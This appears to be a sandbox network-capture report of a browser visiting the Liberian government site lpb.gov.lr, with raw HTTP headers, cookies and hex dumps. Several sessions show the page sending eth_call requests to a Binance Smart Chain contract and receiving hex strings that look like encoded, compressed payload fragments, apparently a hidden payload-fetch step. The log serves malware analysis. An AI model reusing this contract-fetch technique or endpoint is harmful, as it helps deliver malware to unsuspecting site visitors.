                                                                                                                        2025-01-10 13:54:53 UTC1355INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 22 36 35 30 38 38 35 33 32 2d 65 38 65 61 2d 34 38 66 63 2d 62 62 30 34 2d 39 31 63 62 35 65 34 64 66 64 65 36 22 2c 22 72 65 73 75 6c 74 22 3a 22 30 78 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 33 30 34 38 33 34 37 33 34 39 34 31 35 30 36 37 35 39 35 39 36 64 36 33 34 33 32 66 33 33 35 37 35 34 35 35 35 35 32 66 34 33 34 64 34 32 34 34 34 38 33 33 33 30 33 33
                                                                                                                        Data Ascii: {"jsonrpc":"2.0","id":"65088532-e8ea-48fc-bb04-91cb5e4dfde6","result":"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000002304834734941506759596d63432f33575455552f434d424448333033


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        97192.168.2.74992735.71.137.1054432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:54 UTC604OUTPOST / HTTP/1.1
                                                                                                                        Host: bsc-dataseed.binance.org
                                                                                                                        Connection: keep-alive
                                                                                                                        Content-Length: 173
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Content-Type: application/json
                                                                                                                        Accept: */*
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:54 UTC173OUTData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 22 39 61 62 37 64 39 37 62 2d 61 36 66 30 2d 34 31 62 34 2d 38 30 61 32 2d 63 35 31 62 66 31 38 64 64 36 61 31 22 2c 22 6d 65 74 68 6f 64 22 3a 22 65 74 68 5f 63 61 6c 6c 22 2c 22 70 61 72 61 6d 73 22 3a 5b 7b 22 74 6f 22 3a 22 30 78 38 46 42 41 31 36 36 37 42 45 46 35 45 64 41 34 33 33 39 32 38 62 32 32 30 38 38 36 41 38 33 30 34 38 38 35 34 39 42 44 22 2c 22 64 61 74 61 22 3a 22 30 78 35 31 62 63 30 34 37 66 22 7d 2c 22 6c 61 74 65 73 74 22 5d 7d
                                                                                                                        Data Ascii: {"jsonrpc":"2.0","id":"9ab7d97b-a6f0-41b4-80a2-c51bf18dd6a1","method":"eth_call","params":[{"to":"0x8FBA1667BEF5EdA433928b220886A830488549BD","data":"0x51bc047f"},"latest"]}
                                                                                                                        2025-01-10 13:54:54 UTC602INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:54 GMT
                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                        Content-Length: 1163
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Max-Age: 600
                                                                                                                        X-Nr-Trace-Id: a1b9f34ece55be9a3057f52be3f44991
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Referrer-Policy: origin-when-cross-origin
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                        2025-01-10 13:54:54 UTC1163INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 69 64 22 3a 22 39 61 62 37 64 39 37 62 2d 61 36 66 30 2d 34 31 62 34 2d 38 30 61 32 2d 63 35 31 62 66 31 38 64 64 36 61 31 22 2c 22 72 65 73 75 6c 74 22 3a 22 30 78 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 63 38 34 38 33 34 37 33 34 39 34 31 34 32 35 38 35 38 35 31 33 32 36 33 34 33 32 66 33 33 35 36 35 33 35 31 35 35 33 37 34 34 34 64 34 32 34 33 33 38 34 39 32 66 35 35
                                                                                                                        Data Ascii: {"jsonrpc":"2.0","id":"9ab7d97b-a6f0-41b4-80a2-c51bf18dd6a1","result":"0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000001c84834734941425858513263432f335653515537444d424338492f55


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        98192.168.2.74992952.223.34.1554432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:54 UTC348OUTGET / HTTP/1.1
                                                                                                                        Host: bsc-dataseed.binance.org
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:54 UTC563INHTTP/1.1 404 Not Found
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:54 GMT
                                                                                                                        Content-Type: text/plain
                                                                                                                        Content-Length: 18
                                                                                                                        Connection: close
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Max-Age: 600
                                                                                                                        X-Nr-Trace-Id: 89171c9fc9da446c9beaaa7ca531fa5f
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Referrer-Policy: origin-when-cross-origin
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                        2025-01-10 13:54:54 UTC18INData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                                                                        Data Ascii: 404 page not found


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        99192.168.2.74992887.250.251.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:54 UTC1657OUTGET /sync_cookie_image_decide_secondary?token=10611.E_RPzEtQddV8vnmbmr337l8AhKpNAjExaO0ma2jrV489UWaaLcmew_vNOEzVVPlR4V0FkyWD6tXvOp-koVN4RFDajfKwVa-Gertbh0JBcbX7PWnGfqkkQHr8KV5-eSQqWHn092q-SAJ5wKt9uy2VlOci2cQHhZ5JYTT9ijqlRQDjDYA59lR6Mi019uer4JP27BgRTrcR1okFFbS3WOEs7pWSj2X1DAQIkARvPEEYVhY%2C.q-OV7mq2OrNzjNUPbRt_MqDduHY%2C HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; sync_cookie_ok=synced; sync_cookie_csrf_secondary=867164232fake; yp=1736603693.yu.8715430261736517288; ymex=1739109293.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291
                                                                                                                        2025-01-10 13:54:55 UTC1135INHTTP/1.1 200 Ok
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 43
                                                                                                                        Content-Type: image/gif
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:54 GMT
                                                                                                                        Set-Cookie: yandexuid=8715430261736517288; Expires=Mon, 08-Jan-2035 13:54:54 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: yuidss=8715430261736517288; Expires=Mon, 08-Jan-2035 13:54:54 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; Expires=Mon, 08-Jan-2035 13:54:54 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: yp=1736603694.yu.8715430261736517288; Expires=Mon, 08-Jan-2035 13:54:54 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: ymex=1739109294.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; Expires=Sat, 10-Jan-2026 13:54:54 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: sync_cookie_ok_secondary=synced; Expires=Sat, 11-Jan-2025 13:54:54 GMT; Domain=.mc.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:54:55 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        100192.168.2.74993552.223.34.1554432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:55 UTC348OUTGET / HTTP/1.1
                                                                                                                        Host: bsc-dataseed.binance.org
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:55 UTC563INHTTP/1.1 404 Not Found
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:55 GMT
                                                                                                                        Content-Type: text/plain
                                                                                                                        Content-Length: 18
                                                                                                                        Connection: close
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Max-Age: 600
                                                                                                                        X-Nr-Trace-Id: 98748cf66989af60d622a65724b693c8
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Referrer-Policy: origin-when-cross-origin
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                        2025-01-10 13:54:55 UTC18INData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                                                                        Data Ascii: 404 page not found


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        101192.168.2.74993769.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:55 UTC730OUTGET /wp-content/uploads/2024/01/logo-1-150x150.png HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288; _ym_isad=2
                                                                                                                        2025-01-10 13:54:55 UTC363INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:55 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 17 Jan 2024 14:51:58 GMT
                                                                                                                        ETag: "aa07-60f25638a54e0"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 43527
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:55 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: image/png
                                                                                                                        2025-01-10 13:54:55 UTC7829INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 96 00 00 00 96 08 06 00 00 00 3c 01 71 e2 00 00 80 00 49 44 41 54 78 da ec fd 77 94 a5 d9 55 de 8f 7f ce 39 6f bc b1 72 55 57 77 57 e7 30 dd 3d d3 61 72 94 34 a3 51 06 25 44 92 48 06 44 ce f0 c5 60 03 36 06 fc b5 bf 06 63 6c 82 c1 3f 61 19 99 28 04 12 08 a1 9c 26 cf f4 c4 9e e9 9c bb ba ba 2b d7 8d 6f 38 e1 f7 c7 b9 dd 12 18 09 0c 38 60 eb ae d5 6b d6 d4 aa 7b eb bd ef dd f7 ec bd 9f fd 3c cf 86 2f 3d be f4 f8 d2 e3 4b 8f 2f 3d be f4 f8 d2 e3 4b 8f 2f 3d fe be 1f e2 ff f6 1b 70 c3 b7 0b 11 55 21 95 15 91 d9 52 46 a3 3a 90 46 09 db 4a 84 50 08 2b 4b 81 30 0a 21 84 74 0e 23 70 8a c8 08 a3 9c 28 85 33 81 71 41 a4 b1 85 d4 b6 50 26 13 99 2b 4b cd d1 5f 72 ee 4b 81 f5 7f d1 e3 96 1f 8e a5 4a c3 c0 14 36
                                                                                                                        Data Ascii: PNGIHDR<qIDATxwU9orUWwW0=ar4Q%DHD`6cl?a(&+o88`k{</=K/=K/=pU!RF:FJP+K0!t#p(3qAP&+K_rKJ6
                                                                                                                        2025-01-10 13:54:56 UTC8000INData Raw: e2 0b 60 6b 90 42 60 81 5e 99 63 ac c5 38 8b 92 8a cc 14 58 2c 79 59 7a 75 33 82 76 99 23 80 7e 59 10 86 21 da 59 4a ab 31 e0 bb d6 41 ed 03 90 eb 12 15 48 04 d0 d5 39 95 a8 c9 78 7d 0b fb 37 dc c7 ce c9 5b e9 da 92 e3 f3 4f f2 cc d9 3f 67 a5 7d 11 19 d7 19 a9 4c 60 1c fe 9a 9c a5 55 64 d7 4f 7c 15 04 f4 cb 1c 63 0d da 1a 90 be 6e ec ea 3e 95 70 88 28 1c 45 05 0a 87 f4 1c 2f e7 30 38 02 a1 28 9c a1 b0 86 d2 14 a0 24 12 41 5f 17 e4 ba cd c7 4f fc 1e 65 d1 62 b4 be 85 be c9 18 4e 27 b1 2a 4a 4f 2d 1e de 6a c9 0f 0f ed 73 57 e6 9f f8 db 3b e6 fc 9d 02 6b e6 81 b0 16 0f a9 1f bd 71 f3 cb de f6 d6 03 3f ac 4a 2b 71 4a b0 d6 5f a3 34 7d 8c 83 cc 1a 4a 67 28 8c 01 07 1d 93 53 94 05 a5 b1 e4 ce a7 b6 d2 19 b4 85 8d 23 37 b2 67 ea 2e a4 8a fd 07 6e 34 59 99 83 80
                                                                                                                        Data Ascii: `kB`^c8X,yYzu3v#~Y!YJ1AH9x}7[O?g}L`UdO|cn>p(E/08($A_OebN'*JO-jsW;kq?J+qJ_4}Jg(S#7g.n4Y
                                                                                                                        2025-01-10 13:54:56 UTC8000INData Raw: 99 82 18 85 af b3 15 bd b2 1c ec 40 84 ed 13 77 12 cb df e0 33 67 3f c0 c8 f0 8d 54 83 14 e3 1c a2 94 d7 2f c5 94 1a 01 b4 f3 be bf e7 41 48 69 35 c2 49 a2 68 1d 5f 7d eb 3f a5 dd 5f 62 35 5b 63 28 19 22 52 4d 2a 71 85 56 9e 53 e0 b9 6c ed b2 4f 35 c8 31 83 d9 e9 68 75 17 71 5c db 9f 85 ad f5 b7 fc a3 e0 d4 53 7f 69 df f5 7f 13 58 87 be 65 54 b8 a0 b7 af 51 1d 3d b0 75 7c 0f 91 90 68 0c 47 e6 1e a2 9d af 20 ac e5 6a ff 3c 0b 17 2f 82 b0 24 f1 30 27 67 1f a3 2e 6b 8c d5 b6 11 98 90 54 44 20 24 0a 87 11 be 36 8a 45 80 1b a4 9b 1e 05 01 d2 3b b2 98 9c d3 8b 87 19 4a 26 d9 3a 7e 80 48 0c 5c 55 9c 1f 00 07 42 fa 93 47 0a 32 6d 48 44 40 2c 83 c1 50 59 50 5a 4b a8 24 0a 58 5a 5e e2 c8 91 a7 39 79 ec 05 16 56 17 51 b1 c1 52 e0 9c 21 a8 08 1a 63 4d da 65 8f a2 28
                                                                                                                        Data Ascii: @w3g?T/AHi5Ih_}?_b5[c("RM*qVSlO51huq\SiXeTQ=u|hG j</$0'g.kTD $6E;J&:~H\UBG2mHD@,PYPZK$XZ^9yVQR!cMe(
                                                                                                                        2025-01-10 13:54:56 UTC8000INData Raw: b2 4a 2d f2 5e f3 f5 50 0c 84 26 8e 45 34 c6 14 39 b8 e2 0b 77 85 b9 d2 06 d7 5e ec cd b3 92 77 91 3a a3 34 5e bf b7 d2 bd c4 72 67 f6 7a ad d0 ca 97 f9 1c 4c 07 57 ba 57 98 ef af 50 b3 0d 3a f4 3d 70 56 fa 9d 7b c2 f8 25 d7 ce b9 eb 0b bf db 65 46 89 23 4a 26 d9 3c 71 23 2f 5e 79 82 b3 6b 17 49 a3 51 af 44 d6 9a b0 cc fc 3e 68 e5 89 76 c6 f9 e7 f5 8a 9c 5e 90 f9 fd ca d2 9f 4d a5 b5 c4 91 e2 9e 5b 5e c9 c7 5f f8 03 ea 7b 9a 04 72 50 70 b9 6b 1b de f9 3c 74 dc 91 56 22 6e 7d fd 0e f4 cb fc 9d 98 da 94 a2 6d c6 d8 74 c8 3d 6f de cb c7 ff f3 d3 5c 7a f2 2a 02 49 54 51 ec 7e c5 0c 07 5e b1 85 38 55 84 d5 cf 63 2a b8 bf 1a 95 ff 7c 39 b4 bb ce c1 1a 80 f8 36 a6 19 6c 65 6a 62 37 57 3b 6b 84 91 2f b8 65 29 e8 17 39 6b 99 c4 0a 4b 1c 94 9e df 26 3c 30 2c 95 22
                                                                                                                        Data Ascii: J-^P&E49w^w:4^rgzLWWP:=pV{%eF#J&<q#/^ykIQD>hv^M[^_{rPpk<tV"n}mt=o\z*ITQ~^8Uc*|96lejb7W;k/e)9kK&<0,"
                                                                                                                        2025-01-10 13:54:56 UTC8000INData Raw: c3 41 c9 98 24 92 53 4b 49 85 84 2a 22 d2 2a 61 7b c6 f4 95 47 b0 85 43 5d 6e 1a 13 eb e7 72 74 e8 10 eb 0f 3e ce ce ae b5 e4 52 95 d4 66 c6 32 12 1a 86 54 18 2a 10 16 5a 2b 06 c3 12 3a 56 26 3a 25 d6 84 28 8a 41 19 5f 45 44 ca 00 77 47 54 80 52 8a 72 18 8c b2 0d 46 ca c6 67 59 08 7d d3 a2 88 cd 40 3d d6 3a 69 18 eb 51 00 47 59 85 58 98 53 db 48 60 18 16 81 56 89 ec 38 a0 14 06 28 15 a3 44 cc a1 de 4d fc 7a e3 4d 3c b1 fd 5e aa b3 cd 5c 75 c2 27 58 36 ed f5 94 95 19 ba 87 91 31 82 14 42 3f c1 3f 45 a3 aa d4 91 d0 27 56 31 85 28 c0 16 e6 cd 5c 08 cc bf 21 4a 56 84 b2 0a 29 a9 90 20 0c cc 5e 4b 9b 58 3e a9 a1 ad b3 83 7b 7e 70 07 3d 5d 5d cc 99 3f 8f 5c 65 9e 23 fb 0f b1 79 c3 46 56 2e 5f c9 8a a7 96 b3 73 fb 76 a6 cf 9e 4d b6 22 c3 83 5b 6e 8b b7 1e 7e f1
                                                                                                                        Data Ascii: A$SKI*"*a{GC]nrt>Rf2T*Z+:V&:%(A_EDwGTRrFgY}@=:iQGYXSH`V8(DMzM<^\u'X61B??E'V1(\!JV) ^KX>{~p=]]?\e#yFV._svM"[n~
                                                                                                                        2025-01-10 13:54:56 UTC3698INData Raw: db db e8 ed ed 65 eb d6 ad 2c 58 bc 88 1b ae bf 9e 77 be f7 3d 34 8d 6d a6 3e 5d 81 23 6d f2 5e 06 a9 a1 63 60 07 bf 5a fb 95 e0 85 5d 0f 3d 51 1c 2a 7f 2c 18 10 af 6c bc b9 a8 fe bb 9e f7 7f 5b 61 01 74 6c 28 d1 b8 d4 1e b6 d0 6b fa 0a 1d a5 7d bd 1b e6 6a a9 73 d5 b9 89 08 6c 7c 1d 31 9c 98 03 4a ca 6c 01 c6 4e 99 4c a6 22 c7 be bd fb 68 59 b7 91 ce b6 76 2a 2a f2 bc ed 5d d7 b2 f0 e4 13 f9 e9 8f 7e 4c 57 67 27 d9 6c 8e cd 9b 37 f1 f8 a3 8f d1 d7 d3 cb fc c5 8b 78 db 7b df c5 86 f5 eb 79 e9 f9 17 98 30 65 32 ff 76 ed 35 a4 33 06 50 e6 87 21 b7 de 74 0b 37 7f e5 eb ec 39 74 80 93 96 9d 81 14 82 0d 1b 37 f2 f8 c3 8f b0 7c f9 72 0e ec db 6f 94 ad b9 14 4a 68 46 fc 22 48 49 29 32 a7 bd c3 87 0e f3 e8 83 7f e0 f7 bf f9 2d 0f 3f f2 08 7b 76 ef c1 c9 a4 49 e7
                                                                                                                        Data Ascii: e,Xw=4m>]#m^c`Z]=Q*,l[atl(k}jsl|1JlNL"hYv**]~LWg'l7x{y0e2v53P!t79t7|roJhF"HI)2-?{vI


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        102192.168.2.74993677.88.21.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:55 UTC1502OUTGET /sync_cookie_image_decide_secondary?token=10611.E_RPzEtQddV8vnmbmr337l8AhKpNAjExaO0ma2jrV489UWaaLcmew_vNOEzVVPlR4V0FkyWD6tXvOp-koVN4RFDajfKwVa-Gertbh0JBcbX7PWnGfqkkQHr8KV5-eSQqWHn092q-SAJ5wKt9uy2VlOci2cQHhZ5JYTT9ijqlRQDjDYA59lR6Mi019uer4JP27BgRTrcR1okFFbS3WOEs7pWSj2X1DAQIkARvPEEYVhY%2C.q-OV7mq2OrNzjNUPbRt_MqDduHY%2C HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; sync_cookie_ok=synced; sync_cookie_csrf_secondary=867164232fake; _yasc=3uF/2lFvypDsKrJZlPOphP3xGb+rc43dar45OX9iptQ5StXgxHuBuRbJulbOjpTO96tV; yp=1736603694.yu.8715430261736517288; ymex=1739109294.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; sync_cookie_ok_secondary=synced
                                                                                                                        2025-01-10 13:54:56 UTC1135INHTTP/1.1 200 Ok
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 43
                                                                                                                        Content-Type: image/gif
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:56 GMT
                                                                                                                        Set-Cookie: yandexuid=8715430261736517288; Expires=Mon, 08-Jan-2035 13:54:56 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: yuidss=8715430261736517288; Expires=Mon, 08-Jan-2035 13:54:56 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; Expires=Mon, 08-Jan-2035 13:54:56 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: yp=1736603696.yu.8715430261736517288; Expires=Mon, 08-Jan-2035 13:54:56 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: ymex=1739109296.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; Expires=Sat, 10-Jan-2026 13:54:56 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: sync_cookie_ok_secondary=synced; Expires=Sat, 11-Jan-2025 13:54:56 GMT; Domain=.mc.yandex.com; Path=/; SameSite=None; Secure
